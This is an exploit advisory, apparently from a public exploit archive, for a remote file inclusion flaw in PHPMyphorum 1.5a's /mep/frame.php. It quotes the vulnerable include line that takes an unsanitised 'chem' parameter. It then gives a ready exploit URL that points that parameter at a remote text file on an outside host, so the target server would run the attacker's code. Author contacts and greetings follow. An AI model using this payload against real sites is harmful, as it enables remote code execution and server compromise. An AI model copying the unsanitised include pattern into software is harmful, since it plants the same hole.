PHPMyphorum 1.5a - '/mep/frame.php' Remote File Inclusion



EKU-ID: 11126 CVE: OSVDB-45532;CVE-2007-0361 OSVDB-ID:
Author: v1per-haCker Published: 2007-01-17 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#########################################################################
#                                                                       #
#           [ PHPMyphorum 1.5a ]                                        #
#                                                                       #
# Class:     File Include Vulnerability                                 #
# Published  2007/1/17                                                  #
# Remote:    Yes                                                        #
# Critical   Level : Dangerous                                          #
# Site:      http://www.comscripts.com/scripts/php.phpmyphorum.1104.html#
# Author:    TheViper-hacker                                            #
# Contact:   theviper-hacker@hotmail.com        			#
#                       						#
#########################################################################
file ;
frame.php
======================================================
Vuln Code
include("$chem/session/cookie_sys_verif.php");
=======================================================
Exploit :

Http:// www.Victem.0 / [Comment IT_path] /mep/frame.php?chem=http://turnkringonzehoop.be/viper.txt?


 ----  Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA]  ]organza[
 ---- GreeTz: All www.4azhar.Com Members Cont : rida-10@msn.com
--------------------------------------||  Viva ISLAM ||-----------------------------------------

# milw0rm.com [2007-01-17]